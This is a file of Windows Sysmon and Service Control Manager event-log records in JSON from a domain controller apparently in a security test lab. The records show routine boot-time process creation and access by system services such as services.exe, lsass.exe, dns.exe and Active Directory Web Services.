{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1211,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.901\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.901","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1212,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.891\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001054BF0200}\r\nProcessId: 2384\r\nImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nFileVersion: 10.0.14393.0\r\nDescription: Microsoft.ActiveDirectory.WebServices\r\nProduct: Microsoft (R) Windows (R) Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Microsoft.ActiveDirectory.WebServices.exe\r\nCommandLine: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F8D0C92070E59A059A889D5E269C0DA9,SHA256=D40478A82BB2993F39A3ED6066CD0599BE37FF9A0898636A680926FE145C64D6,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.891","ProcessGuid":"{41C8662E-1F73-5F25-0000-001054BF0200}","Image":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","FileVersion":"10.0.14393.0","Description":"Microsoft.ActiveDirectory.WebServices","Product":"Microsoft (R) Windows (R) Operating System","Company":"Microsoft Corporation","OriginalFileName":"Microsoft.ActiveDirectory.WebServices.exe","CommandLine":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F8D0C92070E59A059A889D5E269C0DA9,SHA256=D40478A82BB2993F39A3ED6066CD0599BE37FF9A0898636A680926FE145C64D6,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1213,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.902\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001054BF0200}\r\nTargetProcessId: 2384\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.902","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001054BF0200}","TargetProcessId":"2384","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1214,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.902\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001054BF0200}\r\nTargetProcessId: 2384\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.902","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001054BF0200}","TargetProcessId":"2384","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1215,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.902\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.902","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1216,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.902\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.902","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76824,"ProcessID":856,"ThreadID":920,"Channel":"System","Message":"The AmazonSSMAgent service entered the running state.","param1":"AmazonSSMAgent","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1217,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.872\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nProcessId: 2888\r\nImage: C:\\Windows\\System32\\dns.exe\r\nFileVersion: 10.0.14393.3808 (rs1_release.200707-2105)\r\nDescription: Domain Name System (DNS) Server\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: dns.exe\r\nCommandLine: C:\\Windows\\system32\\dns.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=D12C4522E932461612C72B4EB7A4B3A1,SHA256=BC06AE025E1CDEF4304F0D7983A80D029B6CCBF5761EAB490847100FD161D6FA,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.872","ProcessGuid":"{41C8662E-1F73-5F25-0000-001087BC0200}","Image":"C:\\Windows\\System32\\dns.exe","FileVersion":"10.0.14393.3808 (rs1_release.200707-2105)","Description":"Domain Name System (DNS) Server","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"dns.exe","CommandLine":"C:\\Windows\\system32\\dns.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=D12C4522E932461612C72B4EB7A4B3A1,SHA256=BC06AE025E1CDEF4304F0D7983A80D029B6CCBF5761EAB490847100FD161D6FA,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1218,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.903\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1208\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.903","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1208","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001087BC0200}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1219,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.903\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2532\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B2C10200}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.903","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"2532","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B2C10200}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
